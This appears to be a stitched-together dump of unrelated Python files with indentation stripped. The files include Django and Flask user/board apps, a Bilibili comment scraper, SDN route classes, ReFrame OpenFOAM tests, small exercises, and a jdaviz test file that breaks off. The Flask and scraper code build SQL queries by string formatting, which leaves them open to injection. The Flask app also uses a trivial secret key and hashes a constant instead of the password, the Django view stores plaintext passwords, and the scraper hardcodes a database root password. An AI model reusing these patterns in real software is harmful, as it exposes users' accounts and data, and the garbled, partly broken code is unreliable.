jd = json.loads(request.body)
if jd['action']=='login_progress':
users = list(User.objects.filter(email=jd['email']))
passwords = list(User.objects.filter(password=jd['password'],email=jd['email']))
if users and passwords:
datos={'message':"success"}
else:
datos = {'message': "User not found..."}
print(datos)
return JsonResponse(datos)
# print(jd)
elif jd['action']=='registration_progress':
users = list(User.objects.filter(email=jd['email']))
if users:
datos = {'message': "user already registered"}
else:
User.objects.create(
email=jd['email'], password=jd['password'])
datos={'message':"success"}
print(datos)
return JsonResponse(datos)
def put(self, request, id):
jd = json.loads(request.body)
users = list(User.objects.filter(id=id).values())
user = list(User.objects.filter(email=jd['email']))
if len(users) > 0 and len(user) == 0:
user = User.objects.get(id=id)
user.email = jd['email']
user.save()
datos = {'message': "Success"}
else:
datos = {'message': "User not found..."}
print(datos);
return JsonResponse(datos)
def delete(self, request, id):
users = list(User.objects.filter(id=id).values())
if len(users) > 0:
User.objects.filter(id=id).delete()
datos = {'message': "Success"}
else:
datos = {'message': "User not found..."}
return JsonResponse(datos)
|
from flask.cli import AppGroup
from .users import seed_users, undo_users
from .stories import seed_stories, undo_stories
from .micro_stories import seed_micro_stories
from .formats import seed_formats, undo_formats
from app.models import db
# Creates a seed group to hold our commands
# So we can type `flask seed --help`
seed_commands = AppGroup('seed')
# Creates the `flask seed all` command
@seed_commands.command('all')
def seed():
seed_users()
seed_stories()
seed_formats()
seed_micro_stories()
# Add other seed functions here
# Creates the `flask seed undo` command
@seed_commands.command('undo')
def undo():
undo_users()
undo_stories()
# db.session.execute('TRUNCATE subscription_tiers;')
# db.session.commit()
undo_formats()
# Add other undo functions here
|
from pioneer_sdk import Pioneer
import numpy as np
import cv2
import time
pioneer_mini = Pioneer()
def img_decorate_with_text(image, text, org=(50, 50,)):
font = cv2.QT_FONT_NORMAL
font_scale = 1
color = (0, 255, 0)
thickness = 1
image = cv2.putText(image, text, org, font,
font_scale, color, thickness, cv2.LINE_AA)
return image
class FpsCounter:
PROBE_TIME_SECONDS = 2.0
def __init__(self):
self.time_origin = time.time()
self.frames_overall = 0
self.time = time.time()
self.count = 0
def __reset(self):
self.count = 0
self.time = time.time()
def inc(self) -> float or None:
"""
:return: FPS, if ready. None otherwise
"""
self.count += 1
self.frames_overall += 1
if time.time() - self.time_origin > 10:
self.frames_overall = 0
self.time_origin = time.time()
time_diff = time.time() - self.time
if time_diff > FpsCounter.PROBE_TIME_SECONDS:
fps = self.count / time_diff if self.count > 0 else 0
self.__reset()
return fps
else:
return None
def fps_mean(self) -> float:
return self.frames_overall / (time.time() - self.time_origin)
if __name__ == '__main__':
fps_counter = FpsCounter()
prev_fps = 0
while True:
camera_frame = pioneer_mini.get_raw_video_frame()
if camera_frame is not None:
camera_frame = cv2.imdecode(np.frombuffer(camera_frame, dtype=np.uint8), cv2.IMREAD_COLOR)
fps = fps_counter.inc()
if fps is not None:
prev_fps = fps
camera_frame = img_decorate_with_text(camera_frame, f'fps: {prev_fps}')
camera_frame = img_decorate_with_text(camera_frame, f'fps_mean: {fps_counter.fps_mean()}', (50,100,))
cv2.imshow('pioneer_camera_stream', camera_frame)
key = cv2.waitKey(1)
if key == 27: # esc
print('esc pressed')
cv2.destroyAllWindows()
exit(0) |
# -*- coding: utf-8 -*-
from flask import Flask,session,g,render_template,request,redirect,url_for,escape
import sqlite3
import hashlib
from werkzeug import secure_filename
app = Flask(__name__)
DATABASE = './test.db'
app.secret_key = 'a'
def get_db():
db = getattr(g,'_database',None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
db.row_factory = sqlite3.Row
return db
def init_db():
with app.app_context():
db = get_db()
f=open('schema.sql','r')
db.execute(f.read())
db.commit()
def add_user(user_email,user_pw,user_nick,user_phone):
pw = hashlib.sha224(b"user_pw").hexdigest()
sql = 'insert into users(user_email,user_pw,user_nick,user_phone) values("{}","{}","{}","{}")'.format(user_email,pw,user_nick,user_phone)
db = get_db()
db.execute(sql)
db.commit()
def get_user(user_email,user_pw):
pw = hashlib.sha224(b"user_pw").hexdigest()
sql = 'select * from users where user_email="{}" and user_pw="{}"'.format(user_email,pw)
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
return res
def update_user(user_pw,user_nick,user_phone,user_email):
pw = hashlib.sha224(b"user_pw").hexdigest()
sql = 'update users set user_pw="{}",user_nick="{}",user_phone="{}" where user_email="{}"'.format(pw,user_nick,user_phone,user_email)
db = get_db()
db.execute(sql)
db.commit()
def find_user_info(user_email):
sql = 'select * from users where user_email="{}"'.format(user_email)
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
return res
def del_user(user_email):
sql = 'delete from users where user_email="{}"'.format(user_email)
db = get_db()
db.execute(sql)
db.commit()
return ''
def add_board(title,text,writer,_file):
sql = 'insert into board(title,text,writer,_file) values("{}","{}","{}","{}")'.format(title,text,writer,_file)
db =get_db()
db.execute(sql)
res = db.commit()
return res
def show_all():
sql = 'select idx,title,writer,dt from board'
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
rv.close()
return res
def get_nick(user_email):
sql = 'select user_nick from users where user_email="{}"'.format(user_email)
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
rv.close()
return res
def get_view(idx):
sql = 'select * from board where idx="{}"'.format(idx)
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
rv.close()
return res
def board_editt(idx,title,contents):
sql = 'update board set title="{}",text="{}" where idx="{}"'.format(title,contents,idx)
db = get_db()
db.execute(sql)
db.commit()
@app.route('/')
def index():
return render_template('index.html')
@app.route('/login',methods=['GET','POST'])
def login():
if request.method == 'GET':
if 'user_email' in session:
res = find_user_info(escape(session['user_email']))
return render_template('jisub.html',data=res)
else:
return render_template('login.html')
#return redirect(url_for('index'))
else:
user_email = request.form.get('user_email')
user_pw = request.form.get('user_pw')
ok = get_user(user_email,user_pw)
if ok:
session['user_email'] = user_email
return render_template('jisub.html',data=ok)
else:
return redirect(url_for('index'))
@app.route('/join',methods=['GET','POST'])
def join():
if request.method == 'GET':
return render_template('join.html')
else:
user_email = request.form.get('user_email')
user_pw = request.form.get('user_pw')
user_nick = request.form.get('user_nick')
user_phone = request.form.get('user_phone')
add_user(user_email,user_pw,user_nick,user_phone)
return redirect(url_for('login'))
@app.route('/logout')
def logout():
session.pop('user_email',None)
return redirect(url_for('index'))
@app.route('/edit',methods=['GET','POST'])
def edit():
if request.method == 'GET':
if 'user_email' in session:
res = find_user_info(escape(session['user_email']))
return render_template('edit.html',data=res)
else:
return "fucking man~"
else:
if 'user_email' in session:
user_pw = request.form.get('user_pw')
user_nick = request.form.get('user_nick')
user_phone = request.form.get('user_phone')
update_user(user_pw,user_nick,user_phone,escape(session['user_email']))
res = find_user_info(escape(session['user_email']))
return redirect(url_for('index'))
else:
return "๊บผ์ "
@app.route('/delete')
def del_users():
if 'user_email' in session:
del_user(escape(session['user_email']))
return redirect(url_for('index'))
else:
return 'Error'
@app.route('/board',methods=['GET'])
def board():
if 'user_email' in session:
res = show_all()
return render_template('board.html', data=res)
else:
return redirect(url_for('login'))
@app.route('/board_write',methods=['GET','POST'])
def board_write():
if request.method == 'GET':
if 'user_email' in session:
#res = get_nick(escape(session['user_email']))
res = get_nick(escape(session['user_email']))
return render_template('board_write.html',data=res)
else:
return redirect(url_for('index'))
else:
if 'user_email' in session :
title = request.form.get('title')
contents = request.form.get('contents')
_file = request.files['_file']
res = get_nick(escape(session['user_email']))
if _file:
_file.save('./uploads/'+secure_filename(_file.filename))
add_board(title,contents,res[0][0],_file)
return redirect(url_for('board'))
else:
_file=''
add_board(title,contents,res[0][0],_file)
return redirect(url_for('board'))
else: return redirect(url_for('index'))
@app.route('/board/<idx>',methods=['GET','POST'])
def board_view(idx):
if request.method=='GET':
if 'user_email' in session:
res = get_view(idx)
res2 = board_reply_get(idx)
return render_template('board_view.html',data=res,data2=res2)
else: return redirect(url_for('index'))
else:
re = request.form.get('reply')
nick = get_nick(escape(session['user_email']))
board_reply_save(idx,re,nick[0][0])
return redirect(url_for('board_view',idx=idx))
@app.route('/board_edit/<idx>',methods=['GET','POST'])
def board_edit(idx):
if request.method == 'GET':
if 'user_email' in session:
rt = get_nick(escape(session['user_email']))
res = ghkrdls(idx,rt[0][0])
if res:
return render_template('board_edit.html',data=res)
else: return redirect(url_for('board'))
else: return redirect(url_for('index'))
else:
ed_title = request.form.get('title')
ed_contents = request.form.get('contents')
board_editt(idx,ed_title,ed_contents)
return redirect(url_for('board'))
@app.route('/board_del/<idx>')
def board_del(idx):
if 'user_email' in session:
rt = get_nick(escape(session['user_email']))
res = ghkrdls(idx,rt[0][0])
res2 = board_reply_get(idx)
if res:
board_dell(idx)
return redirect(url_for('board'))
else:return "<script>alert('์ญ์ ๊ถํ์์');history.back()</script>"
else: redirect(url_for('index'))
@app.route('/reply_edit/<idx>', methods=['GET','POST'])
def reply_edit(idx):
if request.method == 'GET':
res = get_reply_idx(idx)
us = get_nick(escape(session['user_email']))
return render_template('reply_edit.html',data=res,us=us)
else:
edit_text = request.form.get('edit')
reply_update(idx,edit_text)
return redirect(url_for('board_view',idx=idx))
@app.route('/reply_del/<idx>')
def reply_del(idx):
if 'user_email' in session:
res = get_reply_idx(idx)
us = get_nick(escape(session['user_email']))
if res[0][1] == us[0][0]:
reply_del(idx)
return redirect(url_for('board_view',idx=idx))
else: return "<script>alert('์ญ์ ๊ถํ์์');history.back()</script>"
else:
redirect(url_for('index'))
def reply_del(idx):
sql = 'delete from board_reply where idx="{}"'.format(idx)
db = get_db()
db.execute(sql)
db.commit()
def reply_update(idx,edit_text):
sql = 'update board_reply set text="{}" where idx="{}"'.format(edit_text,idx)
db = get_db()
db.execute(sql)
db.commit()
def get_reply_idx(idx):
sql = 'select idx2,writer from board_reply where idx="{}"'.format(idx)
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
rv.close()
return res
def ghkrdls(idx,nick):
sql = 'select idx,title,text,writer,_file from board where idx="{}" and writer="{}"'.format(idx,nick)
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
rv.close()
return res
def board_dell(idx):
sql = 'delete from board where idx={}'.format(idx)
db = get_db()
db.execute(sql)
db.commit()
def board_reply_save(idx2,text,writer):
sql = 'insert into board_reply(idx2,text,writer) values("{}","{}","{}")'.format(idx2,text,writer)
db = get_db()
db.execute(sql)
db.commit()
def board_reply_get2(idx):
sql= 'select idx2,text,writer from board_reply where idx="{}"'.format(idx)
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
rv.close()
return res
def board_reply_get(idx):
sql = 'select idx,text,writer,dt from board_reply where idx2="{}"'.format(idx)
db = get_db()
rv = db.execute(sql)
res = rv.fetchall()
rv.close()
return res
if __name__ == '__main__':
app.run(debug=True,host='0.0.0.0',port=8889)
|
# Copyright (c) 2015, BROCADE COMMUNICATIONS SYSTEMS, INC
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
"""
@authors: Sergei Garbuzov
@status: Development
@version: 1.1.0
protocols.py: Protocols specific properties and access methods
"""
import json
from pysdn.common.utils import (strip_none,
remove_empty_from_dict,
dict_keys_underscored_to_dashed)
class StaticRoute():
''' Class representing static route parameters '''
_mn1 = "vyatta-protocols:protocols"
_mn2 = "vyatta-protocols-static:static"
def __init__(self):
''' Static ARP translation (list) '''
self.arp = []
''' Interface based static route '''
self.interface_route = []
''' Interface based IPv6 static route (list) '''
self.interface_route6 = []
''' Static route (list) '''
self.route = []
''' Static IPv6 route (list) '''
self.route6 = []
''' Policy route table (range 1..128) (list) '''
self.table = []
def to_string(self):
""" Return this object as a string """
return str(vars(self))
def to_json(self):
""" Return this object as JSON """
return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True,
indent=4)
def get_payload(self):
s = self.to_json()
obj = json.loads(s)
obj1 = strip_none(obj)
obj2 = remove_empty_from_dict(obj1)
obj3 = dict_keys_underscored_to_dashed(obj2)
payload = {self._mn2: obj3}
return json.dumps(payload, default=lambda o: o.__dict__,
sort_keys=True, indent=4)
def get_url_extension(self):
s = ("%s/%s") % (self._mn1, self._mn2)
return s
def set_interface_route(self, ip_prefix):
route = self._find_create_interface_route(ip_prefix)
assert (isinstance(route, InterfaceRoute))
return route
def set_interface_route_next_hop_interface(self, ip_prefix, if_name,
disable=None, distance=None):
route = self._find_create_interface_route(ip_prefix)
assert (isinstance(route, InterfaceRoute))
route.set_next_hop_interface(if_name, disable, distance)
def _find_create_interface_route(self, ip_prefix):
route = None
for item in self.interface_route:
if (item.tagnode == ip_prefix):
route = item
break
if (route is None):
route = InterfaceRoute(ip_prefix)
self.interface_route.append(route)
return route
class InterfaceRoute():
''' Helper sub-class of the 'Static' class
Interface based static route '''
def __init__(self, ip_prefix):
''' IPv4 Prefix '''
self.tagnode = ip_prefix
''' Next-hop interfaces '''
self.next_hop_interface = []
def set_next_hop_interface(self, ifName, disable=None, distance=None):
next_hop = self._find_create_next_hop_interface(ifName)
assert (isinstance(next_hop, NextHopInterface))
if (disable is not None):
next_hop.set_disable(disable)
if (distance is not None):
next_hop.set_distance(distance)
def disable_next_hop_interface(self, ifName):
next_hop = self._find_create_next_hop_interface(ifName)
assert (isinstance(next_hop, NextHopInterface))
next_hop.set_disable(True)
def enable_next_hop_interface(self, ifName):
next_hop = self._find_create_next_hop_interface(ifName)
assert (isinstance(next_hop, NextHopInterface))
next_hop.set_disable(False)
def set_next_hop_interface_distance(self, ifName, distance):
next_hop = self._find_create_next_hop_interface(ifName)
assert (isinstance(next_hop, NextHopInterface))
next_hop.set_distance(distance)
def _find_create_next_hop_interface(self, ifName):
next_hop = None
for item in self.next_hop_interface:
if (item.tagnode == ifName):
next_hop = item
break
if (next_hop is None):
next_hop = NextHopInterface(ifName)
self.next_hop_interface.append(next_hop)
return next_hop
class NextHopInterface():
''' Helper sub-class of the 'InterfaceRoute' class
Next-hop interface '''
def __init__(self, name):
''' Interface name '''
self.tagnode = name
''' Disable IPv4 interface static route '''
self.disable = None
''' Distance value for this route (range 1..255) '''
self.distance = None
def set_disable(self, value):
if (value):
self.disable = ""
else:
self.disable = None
def set_distance(self, value):
self.distance = value
|
# coding: utf-8
# Writer: bao
# Date: 2018-11-30
import json
import requests
import re
import pymysql
from bs4 import BeautifulSoup
import time
try:
conn = pymysql.connect(host='localhost', user='root', passwd='mysql1820', db='bilibili', use_unicode=True,
charset="utf8")
except Exception as err:
print(str(err))
exit(0)
def create(table_name):
# ไฝฟ็จcursor()ๆนๆณ่ทๅๆไฝๆธธๆ
cursor = conn.cursor()
# ๅฆๆๆฐๆฎ่กจๅทฒ็ปๅญๅจไฝฟ็จ execute() ๆนๆณๅ ้ค่กจใ
cursor.execute("DROP TABLE IF EXISTS %s"%(table_name))
# ๅๅปบๆฐๆฎ่กจSQL่ฏญๅฅ
sql = """CREATE TABLE comment_db (
aid int NOT NULL PRIMARY KEY,
comment varchar(255),
floor int,
rcount int,
likes int,
uname varchar(255),
mid int,
sex varchar(255),
sign varchar(255),
ctime varchar(255))ENGINE=innodb DEFAULT CHARSET=utf8;"""
try:
cursor.execute(sql)
conn.commit()
except:
print('it is failed to create')
conn.rollback()
cursor.close()
def insert_to_comment_db(db,aid):
try:
comment = 1
page = 1
while True:
url = "https://api.bilibili.com/x/v2/reply?&pn=%s&type=1&oid=%s" % \
(page, aid)
resp = requests.get(url)
data_api = resp.json()
temp = data_api['data']
replies = temp['replies']
for reply in replies:
reply['ctime'] =time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(reply['ctime']) )
cursor = db.cursor()
sql = "replaceintocomment_dbvalues(%s,'%s',%s,%s,%s,'%s'," \
"%s,'%s','%s'" \
"'%s')" % \
(aid, reply['content']['message'], reply['floor'], reply['rcount'], reply['like'],
reply['member']['uname'],
reply['member']['mid'], reply['member']['sex'], reply['member']['sign'],
reply['ctime'])
print(sql)
try:
cursor.execute(sql)
db.commit()
comment = comment + 1
except:
print('it is failed to insert')
db.rollback()
cursor.close()
if temp['page']['acount'] > comment:
page = page + 1
else:
break
except:
print("error")
def getbilibili_vedioinf(keyword_list):
try:
for mid in keyword_list:
page = 1
while True:
url_vlist = "https://search.bilibili.com/all?keyword=%s&page=%s" % (
mid, page)
# print url_vlist
response = requests.get(url_vlist)
html_doc = response.text
soup=BeautifulSoup(html_doc,'lxml')
# print(html_doc)
divs = soup.find_all('li',attrs={"class": "video matrix"})
if divs:
for div in divs:
pic=div.find("img").get('src')
length=div.find("span",attrs={"class": "so-imgTag_rb"}).get_text()
avid=div.find(class_="type avid").get_text()
type=div.find(class_="type hide").get_text()
info=div.find("a", attrs={"class": "title"})
title = info.get('title')
url = info.get('href')
des=div.find("div", attrs={"class": "des hide"}).get_text()
tags = div.find("div", attrs={"class": "tags"})
time = tags.find("span", attrs={"class": "so-icon time"}).get_text()
author = tags.find("a", attrs={"class": "up-name"}).get_text()
data=dict(aid=avid[2:],url=url,title = title,description=des.strip(),
type=type.strip(), author=author,created =time.strip(),
length=length.strip(), pic=pic.strip())
insert(conn, data)
page = page + 1
else:
break
except:
print('no found')
if __name__ == "__main__":
# url = 'https://space.bilibili.com/ajax/member/getSubmitVideos?mid=20165629&pagesize=100&tid=0&page=1&keyword=&order=pubdate'
# ๅๅปบๆฐๆฎๅบ
table_name = "keyword_based_info"
create(table_name)
# keyword:
# 20165629 ๅ
ฑ้ๅขไธญๅคฎ
# 10303206 ็ฏ็ๆถๆฅ
# 107255471 CCTV2็ฌฌไธๆถ้ด ๅฎๆน่ดฆๅท
# 258844831 CCTV_ๅฝๅฎถๅฎ่
# 274900004 CCTV4
keyword_list=["ไบบๆฐๆฅๆฅ","ๆฐๅ็คพ","ๆฐๅ็ฝ","ไธญๅฝๆฐ้ป็คพ","CCTV","ไบบๆฐ็ฝ","ไบบๆฐๆฅๆฅ","็ฏ็ๆถๆฅ","ๅ
ฑ้ๅขไธญๅคฎ"]
# space_url = "https://space.bilibili.com/21778636/#/video?tid=0&page=1&keyword=&order=pubdate"
getbilibili_vedioinf(keyword_list)
|
import os
import reframe.utility.sanity as sn
from reframe.core.pipeline import RunOnlyRegressionTest
class OpenfoamExtendBaseTest(RunOnlyRegressionTest):
def __init__(self, check_name, check_descr, **kwargs):
super().__init__('OpenfoamExtend_%s' % (check_name),
os.path.dirname(__file__), **kwargs)
self.descr = check_descr
self.executable = check_name
self.sourcesdir = os.path.join(self.current_system.resourcesdir,
'OpenFOAM-Extend', check_name)
# OpenFOAM-Extend currently runs only on Leone
self.valid_systems = ['leone:normal']
self.valid_prog_environs = ['PrgEnv-gnu']
self.modules = ['OpenFOAM-Extend/4.0-foss-2016b']
self.num_tasks = 1
self.num_tasks_per_node = 1
self.num_cpus_per_task = 1
self.sanity_patterns = sn.assert_found(r'^\s*[Ee]nd', self.stdout)
if self.num_tasks > 1:
self.sanity_patterns = sn.assert_found(
r'Finalising parallel run', self.stdout)
self.maintainers = ['MaKra']
self.tags = {'scs', 'production'}
self.pre_run = ['source $FOAM_INST_DIR/foam-extend-4.0/etc/bashrc']
class BlockMesh(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__('blockMesh',
'OpenFOAM-Extend blockMesh from '
'the dambreak tutorial',
**kwargs)
class SnappyHexMesh(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'snappyHexMesh',
'OpenFOAM-Extend check of snappyHexMesh: motorbike tutorial',
**kwargs)
class SimpleFoam(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'simpleFoam',
'OpenFOAM-Extend check of simpleFoam: motorbike tutorial',
**kwargs)
self.executable_opts = ['-parallel']
self.num_tasks = 6
self.num_tasks_per_node = 6
result = sn.extractall(
r'time step continuity errors : '
r'\S+\s\S+ = \S+\sglobal = (?P<res>-?\S+),',
self.stdout, 'res', float)
self.sanity_patterns = sn.all(
sn.map(lambda x: sn.assert_lt(abs(x), 5.e-04), result))
class SetFields(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'setFields',
'OpenFOA-Extend check of setFields: dambreak tutorial',
**kwargs)
class InterMixingFoam(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'interMixingFoam',
'OpenFOA-Extend check of interMixingFoam: dambreak tutorial',
**kwargs)
self.sanity_patterns = sn.assert_eq(sn.count(sn.findall(
r'Air phase volume fraction', self.stdout)), 2944)
class BuoyantBoussinesqSimpleFoam(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'buoyantBoussinesqSimpleFoam',
'OpenFOAM-Extend check buoyantBoussinesqSimpleFoam: hotRoom test',
**kwargs)
self.executable = 'buoyantBoussinesqSimpleFoam'
result = sn.extractall(
r'\sglobal\s=\s(?P<res>\S+),',
self.stdout, 'res', float)
self.sanity_patterns = sn.all(
sn.map(lambda x: sn.assert_lt(abs(x), 1.e-17), result))
class LaplacianFoam(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__('laplacianFoam',
'OpenFOAM-Extend check of setFields: flange tutorial',
**kwargs)
class FoamToEnsight(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__('foamToEnsight',
'OpenFOAM-Extend check of setFields: flange tutorial',
**kwargs)
class SetSet(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'setSet',
'OpenFOAM-Extend check of setFields: multi region heater tutorial',
**kwargs)
self.executable_opts = ['-batch makeCellSets.setSet']
class SetsToZones(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'setsToZones',
'OpenFOAM-Extend check of setFields: multi region heater tutorial',
**kwargs)
self.executable_opts = ['-noFlipMap']
class SplitMeshRegions(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'splitMeshRegions',
'OpenFOAM-Extend check of setFields: multi region heater tutorial',
**kwargs)
self.executable_opts = ['-cellZones', '-overwrite']
class DecomposePar(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'decomposePar',
'OpenFOAM-Extend check of reconstructPar: multiRegionHeater test',
**kwargs)
self.executable_opts = ['-region heater']
class ChtMultiRegionSimpleFoam(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'chtMultiRegionSimpleFoam',
'OpenFOAM-Extend check of reconstructPar: multiRegionHeater test',
**kwargs)
self.executable_opts = ['-parallel']
self.num_tasks = 4
self.num_tasks_per_node = 4
result = sn.extractall(
r'\sglobal\s=\s(?P<res>-?\S+),',
self.stdout, 'res', float)[-5:]
self.sanity_patterns = sn.all(
sn.map(lambda x: sn.assert_lt(abs(x), 1.e-04), result))
class ReconstructPar(OpenfoamExtendBaseTest):
def __init__(self, **kwargs):
super().__init__(
'reconstructPar',
'OpenFOAM-Extend check of reconstructPar: multiRegionHeater test',
**kwargs)
self.executable_opts = ['-latestTime', '-region heater']
self.readonly_files = ['processor0',
'processor1',
'processor2',
'processor3']
self.sanity_patterns = sn.assert_found(r'Time = 1000', self.stdout)
def _get_checks(**kwargs):
return [
BlockMesh(**kwargs),
SnappyHexMesh(**kwargs),
SimpleFoam(**kwargs),
SetFields(**kwargs),
InterMixingFoam(**kwargs),
BuoyantBoussinesqSimpleFoam(**kwargs),
LaplacianFoam(**kwargs),
FoamToEnsight(**kwargs),
SetSet(**kwargs),
SetsToZones(**kwargs),
SplitMeshRegions(**kwargs),
DecomposePar(**kwargs),
ChtMultiRegionSimpleFoam(**kwargs),
ReconstructPar(**kwargs)]
|
class Node:
def __init__(self,data, nxt=None):
self.data = data
self.nxt = nxt
class linkedList:
def __init__(self,head=None):
self.head = Node(head)
def insert_head(self, val):
newNode = Node(val,self.head)
self.head = newNode
def insert_tail(self,val):
new_node = Node(val)
if self.head == None:
self.head = new_node
else:
curr = self.head
while curr.nxt:
curr = curr.nxt
curr.nxt = new_node
def insert_index(self,val, index):
new_node = Node(val)
count = 0
curr = self.head
if index == 0:
temp = self.head
self.head = new_node
self.head.nxt = temp
temp.prev = new_node
else:
while curr:
if (count == index - 1):
break
else:
count += 1
curr = curr.nxt
new_node.nxt = curr.nxt
curr.nxt = new_node
def printList(self):
curr = self.head
while curr:
print(curr.data)
curr = curr.nxt
def find_middle(self):
fst_ptr = self.head
slow_ptr = self.head
while fst_ptr and fst_ptr.nxt:
fst_ptr = fst_ptr.nxt.nxt
slow_ptr = slow_ptr.nxt
print(slow_ptr.data)
new_node = linkedList()
new_node.insert_tail(4)
new_node.insert_tail(6)
new_node.insert_tail(8)
new_node.insert_tail(9)
new_node.insert_tail(10)
new_node.insert_tail(54)
new_node.insert_tail(45)
new_node.printList()
print("-------------")
new_node.find_middle()
|
#!/usr/bin/env python
#
# Name: gendershosts.py
# Desc: Splunk search command for parameterizing searches based on Genders queries
#
# Quickly hacked together by Wil Cooley <wcooley@pdx.edu>
#
import re
import sys
from subprocess import PIPE, STDOUT
import subprocess
def err(msg="Undetermined error"):
print "ERROR"
print msg
sys.exit(0)
if __name__ == '__main__':
if len(sys.argv) < 2:
genders_query = '~NONE' # Trick to list all hosts
else:
genders_query = sys.argv[1]
if len(sys.argv) > 2:
header = sys.argv[2]
else:
header = "host"
if re.search('[^\w\d&|~\-()=:\.]', genders_query):
err("Inappropriate character in Genders query")
hosts = subprocess.Popen( ['/usr/bin/nodeattr', '-n', genders_query], \
stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True).communicate()[0]
print header
print hosts,
|
def checkio(text, word):
text=text.lower()
l = len(word)
first_letter= word[0]
text_list = [[c for c in l.replace(" ", "")] for l in text.split("\n")]
rows = len(text_list)
for i in range(rows):
for j in range(len(text_list[i])):
if text_list[i][j] == first_letter:
if len(text_list[i])-j >=l and "".join(text_list[i][j:j+l])==word:
return [i+1,j+1,i+1,j+l]
if rows-i >=l and "".join([row[j] if len(row)>j else "#" for row in text_list][i:i+l])==word:
return [i+1,j+1,i+l,j+1]
#These "asserts" using only for self-checking and not necessary for auto-testing
if __name__ == '__main__':
assert checkio("""DREAMING of apples on a wall,
And dreaming often, dear,
I dreamed that, if I counted all,
-How many would appear?""", "ten") == [2, 14, 2, 16]
assert checkio("""He took his vorpal sword in hand:
Long time the manxome foe he sought--
So rested he by the Tumtum tree,
And stood awhile in thought.
And as in uffish thought he stood,
The Jabberwock, with eyes of flame,
Came whiffling through the tulgey wood,
And burbled as it came!""", "noir") == [4, 16, 7, 16]
assert checkio("""Hi all!
And all goodbye!
Of course goodbye.
or not""", "haoo") == [1, 1, 4, 1]
assert checkio("""xa
xb
x""", "ab") == [1, 2, 2, 2]
print("Coding complete? Click 'Check' to earn cool rewards!") |
import pytest
from astropy.io import fits
from astropy.utils.data import download_file
from jdaviz.utils import PRIHDR_KEY
@pytest.mark.remote_data
def test_2d_parser_jwst(specviz2d_helper):
fn = download_file('https://stsci.box.com/shared/static/exnkul627fcuhy5akf2gswytud5tazmw.fits', cache=True) # noqa
specviz2d_helper.load_data(spectrum_2d=fn)
assert len(specviz2d_helper.app.data_collection) == 2
dc_0 = specviz2d_helper.app.data_collection[0]
assert dc_0.label == 'Spectrum 2D'
assert PRIHDR_KEY not in dc_0.meta
assert 'header' not in dc_0.meta
assert dc_0.meta['DETECTOR'] == 'MIRIMAGE'
assert dc_0.get_component('flux').units == 'MJy / sr'
dc_1 = specviz2d_helper.app.data_collection[1]
assert dc_1.label == 'Spectrum 1D'
assert 'header' not in dc_1.meta
# extracted 1D spectrum should have same flux units as 2d spectrum
assert dc_1.get_component('flux').units == dc_0.get_component('flux').units
# Also check the coordinates info panel.
viewer_2d = specviz2d_helper.app.get_viewer('spectrum-2d-viewer')
label_mouseover = specviz2d_helper.app.session.application._tools['g-coords-info']
label_mouseover._viewer_mouse_event(viewer_2d,
{'event': 'mousemove', 'domain': {'x': 350, 'y': 30}})
assert label_mouseover.as_text() == ('Pixel x=0350.0 y=0030.0 Value +3.22142e+04 MJy / sr',
'', '')
@pytest.mark.remote_data
def test_2d_parser_ext_transpose_file(specviz2d_helper):
fn = download_file('https://stsci.box.com/shared/static/e3n30l8vr7hkpnuy7g0t8c5nbl70632b.fits', cache=True) # noqa
specviz2d_helper.load_data(spectrum_2d=fn, ext=2, transpose=True)
dc_0 = specviz2d_helper.app.data_collection[0]
assert dc_0.get_component('flux').shape == (3416, 29)
@pytest.mark.remote_data
def test_2d_parser_ext_transpose_hdulist(specviz2d_helper):
